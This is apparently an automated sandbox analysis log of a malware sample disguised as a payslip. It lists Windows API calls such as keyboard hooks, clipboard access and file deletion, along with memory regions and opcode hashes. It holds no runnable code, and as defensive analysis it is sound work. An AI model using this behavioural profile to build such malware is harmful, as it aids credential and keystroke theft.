                                                                                                            • Source File: 00000002.00000002.4142395831.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CallProcWindow
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4142395831.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Clipboard
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4142395831.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Clipboard
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05629F5F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4142395831.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05629F5F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4142395831.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            APIs
                                                                                                            • DeleteFileW.KERNEL32(00000000), ref: 00C780B0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4120922070.0000000000C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_c70000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DeleteFile
                                                                                                            APIs
                                                                                                            • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 0562D66B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4142395831.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HookWindows
                                                                                                            APIs
                                                                                                            • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 0562D66B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4142395831.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HookWindows
                                                                                                            APIs
                                                                                                            • DeleteFileW.KERNEL32(00000000), ref: 00C780B0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4120922070.0000000000C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_c70000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DeleteFile
                                                                                                            APIs
                                                                                                            • GlobalMemoryStatusEx.KERNEL32 ref: 00C7EFDF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4120922070.0000000000C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_c70000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: GlobalMemoryStatus
                                                                                                            APIs
                                                                                                            • OleInitialize.OLE32(00000000), ref: 0562B9BD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4142395831.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Initialize
                                                                                                            APIs
                                                                                                            • OleInitialize.OLE32(00000000), ref: 0562B9BD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4142395831.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Initialize
                                                                                                            APIs
                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,0562B075), ref: 0562B0FF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4142395831.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CallbackDispatcherUser
                                                                                                            APIs
                                                                                                            • OleInitialize.OLE32(00000000), ref: 0562B9BD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4142395831.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5620000_Payslip_October_2024.jbxd
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7065682adb39ead302100feae6318400feffeda44f74e992b770b0be91c4c24b
                                                                                                            • Instruction ID: cfffc1e32dd082095998d8b0104f4d4136e7c235b6d0d2490d53075cd024a9e8
                                                                                                            • Opcode Fuzzy Hash: 7065682adb39ead302100feae6318400feffeda44f74e992b770b0be91c4c24b
                                                                                                            • Instruction Fuzzy Hash: 6051E131F005169FDF65EB78E8446AEBBB2EB84315F10886AE00AD7351DF318955CB81
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1872191bb75e9f7accf5c63f1fdf93a0fc9da79f2ba8c965b29544e122e2c8bf
                                                                                                            • Instruction ID: d31939eb9abbe3b4d303417ca2eda7b49c441a3316ca6f9e0b9b9a1de4090938
                                                                                                            • Opcode Fuzzy Hash: 1872191bb75e9f7accf5c63f1fdf93a0fc9da79f2ba8c965b29544e122e2c8bf
                                                                                                            • Instruction Fuzzy Hash: 9251F470B202259BEF64667CD964B2F26AAD78D706F20442AE50EC77D4DF38CC419B92
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a1dbd20d6ee11026ed0a0c4b3c5584f3c80e8c11e00dd50cf7bbf658c3b67ecb
                                                                                                            • Instruction ID: 2721aee9d164d04eb9dad2b92e5613c0427706b7eb2ded4706d11c2255548c8c
                                                                                                            • Opcode Fuzzy Hash: a1dbd20d6ee11026ed0a0c4b3c5584f3c80e8c11e00dd50cf7bbf658c3b67ecb
                                                                                                            • Instruction Fuzzy Hash: E651F970B202259BEF64666CD96472F36AAD78D702F20442AE50EC77D4DF3CCC419B92
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: cca0ce35eaed210e7ca6eb25ceb1de600c61914b32bfd1fd8a68b7c8a5b54108
                                                                                                            • Instruction ID: c08df0dd403d75ef0cd0e24e37edd6cd54d81badc0cdda9f2f8f7c3817032b27
                                                                                                            • Opcode Fuzzy Hash: cca0ce35eaed210e7ca6eb25ceb1de600c61914b32bfd1fd8a68b7c8a5b54108
                                                                                                            • Instruction Fuzzy Hash: 36414C71E00A1A8FDB70CF99D8C1AAFFBB2EB84310F10492AE116D6650D334E9558F91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1f126342776d1a8cb3c9d12fb46b347f20d487a005c3f7c214431f215c17872a
                                                                                                            • Instruction ID: 9b58be6439e0b824b9d6b8d870b6dbce0884d3cb23bc2d0bd54f5220510aa559
                                                                                                            • Opcode Fuzzy Hash: 1f126342776d1a8cb3c9d12fb46b347f20d487a005c3f7c214431f215c17872a
                                                                                                            • Instruction Fuzzy Hash: EB41E2B1D00309DBDB14DFAAC584ADEBBB5EF49344F248029D449AB211D775AA4ACF90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6e1d608da71940dab208e2423e1d89501ffed14cd4e24782466776a471a3070c
                                                                                                            • Instruction ID: 870ab51621cf7f65de72523ef15c2d428d76022bed83d6ab70ea4445d0e59e49
                                                                                                            • Opcode Fuzzy Hash: 6e1d608da71940dab208e2423e1d89501ffed14cd4e24782466776a471a3070c
                                                                                                            • Instruction Fuzzy Hash: BD31A270E1072A8BCF65DF68C89069EBBF2FF85305F148929E405EB741EB70E9468B41
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3dd3af167ad433b791e6567c8ed0fa87dd92bfbbe3f7775221856f07753d1519
                                                                                                            • Instruction ID: 3eae7d71bf5fe6b82988efc013074b413d02cfd3cf6971b1bda1c467e5803aaf
                                                                                                            • Opcode Fuzzy Hash: 3dd3af167ad433b791e6567c8ed0fa87dd92bfbbe3f7775221856f07753d1519
                                                                                                            • Instruction Fuzzy Hash: 6641E2B1D00309CBDB14DFAAC584ADEBBF5BF49344F248029D448BB211D775AA4ACF90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 698d3b4d53bd2d3f181805e48f065cc668b4bce022bd75d8ef525b1fe7f8570a
                                                                                                            • Instruction ID: f09d0131e4be689a00db0c80175825a62b6ac52f4946de494d17386a9f35090f
                                                                                                            • Opcode Fuzzy Hash: 698d3b4d53bd2d3f181805e48f065cc668b4bce022bd75d8ef525b1fe7f8570a
                                                                                                            • Instruction Fuzzy Hash: F3319034E106169BCB45DFA4D868A9EF7F6BF89310F148829E906A7341DB31AD42CF40
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e922d512090fbcd0b53349729cba589c75dc7adb313038829ed12451c097c59f
                                                                                                            • Instruction ID: 03ce2bab8f6ddb8b95289c3097f2b346f2842fde99587cb4280ff8dd230261b1
                                                                                                            • Opcode Fuzzy Hash: e922d512090fbcd0b53349729cba589c75dc7adb313038829ed12451c097c59f
                                                                                                            • Instruction Fuzzy Hash: 1031A030E106169BCB19CFA5D864A9EB7F6BF89300F148929E906E7340DB71ED82CF40
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8f850b56dd4c8e5df3965bc1b92f272341df02ecf1bb031104eecdfcc35337d9
                                                                                                            • Instruction ID: 1cdf2621d43a83b2c1e0f0a6139e2d9cff46c050933512e435a6e2a34300ecfd
                                                                                                            • Opcode Fuzzy Hash: 8f850b56dd4c8e5df3965bc1b92f272341df02ecf1bb031104eecdfcc35337d9
                                                                                                            • Instruction Fuzzy Hash: F921F7B1A002048FC7119F79D4595EBBBF6EF81704705C4AAD14ADB351EF34DC0A8B91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6ec028e4348b038aa99f4812376b82657a08d5b6e52f38a4bbf94fe7063ce83c
                                                                                                            • Instruction ID: 728d2303fe70b9679906e3d3eb26b1754c06ab75f6dc6655e653f81c7981e6d5
                                                                                                            • Opcode Fuzzy Hash: 6ec028e4348b038aa99f4812376b82657a08d5b6e52f38a4bbf94fe7063ce83c
                                                                                                            • Instruction Fuzzy Hash: 902124347002149FDB04EB78D960BAE3BF6EB88304F204429D50DD7B92EB35AD42C791
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0450e5d62579caf3223671be92bb34728c27b0d4e6e60a1d63a0b4ba87493818
                                                                                                            • Instruction ID: b47475fd83ac8ca3e22b3885a2dbe64e15318507e4743cdbfa9bc6c1f56a223d
                                                                                                            • Opcode Fuzzy Hash: 0450e5d62579caf3223671be92bb34728c27b0d4e6e60a1d63a0b4ba87493818
                                                                                                            • Instruction Fuzzy Hash: 5A218935E002169FDB40DF69D980BAEBBF5EB88750F108029E905E7384EB71ED518F91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: cda5991cca5dd945de41887dae8981b0cf970edb8d7b7bcf0107ede497168a5e
                                                                                                            • Instruction ID: 0c714971f2bc65c495e99ad7e743b61ecda49256eb724d207304005f3c19a071
                                                                                                            • Opcode Fuzzy Hash: cda5991cca5dd945de41887dae8981b0cf970edb8d7b7bcf0107ede497168a5e
                                                                                                            • Instruction Fuzzy Hash: A8218B75E006169FDB50DF68D980AAEBBF5EB88750F108029E905E7384EB71DD418F91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4120519688.0000000000BED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BED000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_bed000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 95d32179a87aca4b211b132a4da8c3bd0af79202a744732d6a2e2afd5164a87d
                                                                                                            • Instruction ID: b223f8895c9bc33b4bd29b1e561696d887fc1d7a6cae7ad7b397205821481ff7
                                                                                                            • Opcode Fuzzy Hash: 95d32179a87aca4b211b132a4da8c3bd0af79202a744732d6a2e2afd5164a87d
                                                                                                            • Instruction Fuzzy Hash: 4C216F755093C49FC7038B24D9A0711BF71EB46214F29C5DBD9898B2A3C37A980ACB62
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 37baa73257a3dbacf046bfa96144cf6be4f4755db7104e977a03ac5eac64ea2b
                                                                                                            • Instruction ID: b45b6de10891d09c62a4ca4ac9d2ecdaef34cb5cf67f5b644c2f63615ed76cc7
                                                                                                            • Opcode Fuzzy Hash: 37baa73257a3dbacf046bfa96144cf6be4f4755db7104e977a03ac5eac64ea2b
                                                                                                            • Instruction Fuzzy Hash: 4321FF34B002159FDB04EB78D964B6F77EAEB88314F204428E509D7B85EF35AD42C7A1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9e4c4d94f450837a0d99f4304e19436b9c0101b8705fe80ebdd7b7a060e88057
                                                                                                            • Instruction ID: ece2602054ca5f5db8d7b1eefbf71d34d09c6ff309c89b48bbf6b27e364e7381
                                                                                                            • Opcode Fuzzy Hash: 9e4c4d94f450837a0d99f4304e19436b9c0101b8705fe80ebdd7b7a060e88057
                                                                                                            • Instruction Fuzzy Hash: E531F4B0D01218DFDB10DF9AC585BCEBBF5AB49314F24801AE444B7351C7B5A946CF95
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4120519688.0000000000BED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BED000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_bed000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 37d779ebb3dd1623938b2a255c133513c4f5853cd23b5ef791332c51d3c06dc5
                                                                                                            • Instruction ID: 97a145efdbda3e6f2680e00380f794b2014f3958381661af74c7a01e596bda22
                                                                                                            • Opcode Fuzzy Hash: 37d779ebb3dd1623938b2a255c133513c4f5853cd23b5ef791332c51d3c06dc5
                                                                                                            • Instruction Fuzzy Hash: AC213BB1504284DFDB11DF15D9C4B26BBE5FB94324F24C6ADD9090B345C3B6D806DA61
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4120519688.0000000000BED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BED000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_bed000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b3daacf817c5e4d3bd2e9ef45c810b67625a224d88fd446fcb079c5a60062e1c
                                                                                                            • Instruction ID: 37e76e31be8d57731befca69bcb9faf29448d9597380e2022aedf2333eb5b034
                                                                                                            • Opcode Fuzzy Hash: b3daacf817c5e4d3bd2e9ef45c810b67625a224d88fd446fcb079c5a60062e1c
                                                                                                            • Instruction Fuzzy Hash: 852125B5604280DFCB04DF15D5C4B25BBB5FBA4314F20C5ADD90A4B392C3B6E806CB62
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4120519688.0000000000BED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BED000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_bed000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a610a5dc0c778f757029fe871a6350b74e69daf5515e5fca6dfc663e9225b362
                                                                                                            • Instruction ID: cc860fb2bbd33bd7b2b1b3fc070ec13985cbca769bf954ca2a25497df1b607f2
                                                                                                            • Opcode Fuzzy Hash: a610a5dc0c778f757029fe871a6350b74e69daf5515e5fca6dfc663e9225b362
                                                                                                            • Instruction Fuzzy Hash: 9D212571604280DFCB10DF14D9D0B26BBE5FB84314F28C6ADD80A4B392C3B6D807CA62
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ee51ad217b839d28c3fc9d47c6c47deeaea783e46bce87cc52ae04b418ebcbd2
                                                                                                            • Instruction ID: 5ab62e65ad71768bfe06dfec744c7c4339d14c4d2430f992462b633e548deda6
                                                                                                            • Opcode Fuzzy Hash: ee51ad217b839d28c3fc9d47c6c47deeaea783e46bce87cc52ae04b418ebcbd2
                                                                                                            • Instruction Fuzzy Hash: A0215071D10B2A8BDF65CFA9C44069EBBB1FF85314F14892AE805EB340E770A945CF81
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4120519688.0000000000BED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BED000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_bed000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 023868730c8050a22738f0bb5f87c98c87e75772e390d95740429b4e001d6a11
                                                                                                            • Instruction ID: 6193ad85062936efeeca4d660e9e8b5f0172974f0483f8be64f29abf2ff16f6a
                                                                                                            • Opcode Fuzzy Hash: 023868730c8050a22738f0bb5f87c98c87e75772e390d95740429b4e001d6a11
                                                                                                            • Instruction Fuzzy Hash: 782101B1604380DFDB04DF15C9C4B26BBE6FB94318F20C6ADE80A5B391C37AD846C662
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: dba27ecfc7853ab381523a248c6a6316fd933293f7905f03ec5f69efcda425f6
                                                                                                            • Instruction ID: 6226f1983359ec84ae83425eda6e0e764f6364566469bc84a95686f531591d79
                                                                                                            • Opcode Fuzzy Hash: dba27ecfc7853ab381523a248c6a6316fd933293f7905f03ec5f69efcda425f6
                                                                                                            • Instruction Fuzzy Hash: 18212C32E042095FCB04EFB5EC055DFBBB6EFC6314B04C466D505EB242EA306905CB90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d8367a2de12427b9b61aded677bf74312c84a85e9070c80c5c62ca54007cbbd1
                                                                                                            • Instruction ID: cd0a16bb7e54c24bbfb50817a039afcb02a12f3fefb512385a430612c49c3968
                                                                                                            • Opcode Fuzzy Hash: d8367a2de12427b9b61aded677bf74312c84a85e9070c80c5c62ca54007cbbd1
                                                                                                            • Instruction Fuzzy Hash: E631E2B0D00218DFDB10DF9ACA89BDEBBF9AB49314F24801AE545B7341C7B5A845CBA5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 430b0fa3bbf7012df3df330bb6d2229cb9f700573bb439647cf9ccdd4c136188
                                                                                                            • Instruction ID: 9bfa4cc6457ff9a794740f7701f22e61ea1e2ac3a900df4ca525f75f0d496096
                                                                                                            • Opcode Fuzzy Hash: 430b0fa3bbf7012df3df330bb6d2229cb9f700573bb439647cf9ccdd4c136188
                                                                                                            • Instruction Fuzzy Hash: 441103B47003118FD316AF39D49469AB7E6FB85345720897DD15A8B385DF32AD07CB90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7e53a6e02108e238b5aa715d7643badbb6e7574540123231266a0a1e89eca946
                                                                                                            • Instruction ID: 1f7f0edb5e022724a4640ecd22fe22f49153345303708970a8ebde480f8fd86f
                                                                                                            • Opcode Fuzzy Hash: 7e53a6e02108e238b5aa715d7643badbb6e7574540123231266a0a1e89eca946
                                                                                                            • Instruction Fuzzy Hash: FD2130B0E043488FCB10DFAAD9886CEFFF4EB49310F54842AD459A3200C778A909CFA1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 623a4bad39506feda64e1eb27359893052e58a7958b9e7b5105a0b540e06819e
                                                                                                            • Instruction ID: db6dd2b56b3ca2981ea901ab8236cab5d936757914fed9f2c807b2bd7d0b5398
                                                                                                            • Opcode Fuzzy Hash: 623a4bad39506feda64e1eb27359893052e58a7958b9e7b5105a0b540e06819e
                                                                                                            • Instruction Fuzzy Hash: 181100666156504FD7128B7A98965E67FE0EF9B21530A41FBD1ACCB3D2DA105807C382
                                                                                                            Memory Dump Source
